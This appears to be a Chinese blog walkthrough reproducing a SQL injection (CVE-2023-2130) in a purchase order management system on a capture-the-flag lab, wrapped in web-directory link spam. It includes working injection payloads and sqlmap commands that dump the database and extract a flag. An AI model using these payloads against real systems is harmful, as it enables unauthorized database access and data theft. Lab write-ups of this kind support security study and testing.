当前位置: 首页 > wzjs >正文

柳州网站建设工作室郑州网站推广 汉狮网络

wzjs 2025/9/2 11:16:39
柳州网站建设工作室,郑州网站推广 汉狮网络,如何做一网站首页,四川建设网入川备案网站目录标题 漏洞介绍EXP漏洞复现 漏洞介绍 ​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。 影响版本 Sour…

目录标题

    • 漏洞介绍
    • EXP
    • 漏洞复现

漏洞介绍

​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

影响版本

SourceCodester采购订单管理系统1.0

EXP

sqlmap

Parameter: id (GET)Type: boolean-based blind   #布尔盲注Title: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 8712=8712 AND 'qmcT'='qmcTType: error-based        #报错注入Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' OR (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1285=1285,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OHDM'='OHDM#floor():利用 GROUP BY 分组时的随机数冲突,触发错误Type: time-based blind    #时间盲注Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 4238 FROM (SELECT(SLEEP(5)))KfhW) AND 'apvD'='apvD

漏洞复现

一个登录框

image-20250609181808222

抓包登录,回显有内容

image-20250609182129426

存在sql查询语句

查找users表下username=admin,且password=132456的md5值的结果

{"status":"incorrect","last_qry":"SELECT * from users where username = 'admin' and password = md5('132456') "}

访问该路径

http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php

跟上id参数后出现回显,调用了数据库信息

image-20250609183131478

简单测了一下,单引号存在注入,**–+**可以注释

image-20250609183257707

使用sqlmap去跑,跑数据库

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs 
available databases [4]:
[*] information_schema 
[*] mysql
[*] performance_schema
[*] purchase_order_db

爆数据表

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+

fllllaaaag表下的数据

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --dump

或者爆fllllaaaag表下的列

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --columns
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+

然后再爆破具体的内容

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag -C flag --dump

flag

flag{ae8dbccb-c588-434a-9da6-e4fd3e9d8f1d}
http://www.dtcms.com/wzjs/580642.html

相关文章:

  • 教育培训机构网站模板个人网站域名用什么好
  • 汽车便宜网站建设手机网站开发目的
  • 手机自己做网站江西省城乡建设厅网站
  • 114物流网站怎么做建行赤峰市分行 - 欢迎访问中国建设银行网站
  • 做视频网站技术壁垒在哪里医疗网站建设平台
  • 做网站好一点的公司网站建设中间件收费
  • 怎么制做网站大发快三网站自做
  • 上海公司注册网站网站设计的公司怎么样
  • vivo手机为什么建设网站成都网站设计公司排名
  • 心连网网站网站开发的公司电话
  • 哪家网站建设公司专业重庆旅游网页制作
  • 做pc端网站要多少钱买邮箱的网站
  • 企业网站建设 全包中国手机网站建设公司
  • 如何在app上做网站wordpress 本地视频插件
  • 网站 空间地址是什么wordpress主题取消
  • 北京旅游型网站建设想建设网站
  • 巩义做网站优化宝安的医院网站建设
  • 重庆最好的网站建设公司网站详情页怎么做的
  • 做网站网页的工作怎么样风格网站
  • 兼职做网站的软件php做网站的源码
  • 公司网站建设方案设计新手怎么自学ps
  • 查询网站流量排名三鼎网络网站建设
  • 东莞网站建设做公司wordpress 好用的主题
  • 扬州电子商务网站建设开发网站如何选需要注意什么
  • 做推广哪个平台网站好wordpress主题 排名
  • 网站做镜像检查漏洞做软件的人叫什么
  • 网站开发的进度安排会计网站建设意义
  • 做网站前台需要学什么 后台什么网站可以做进出口买卖
  • 个人网站建设案例课堂乐清装修网站哪个好
  • 利用第三方做网站永久发布地址中华室内设计网节点图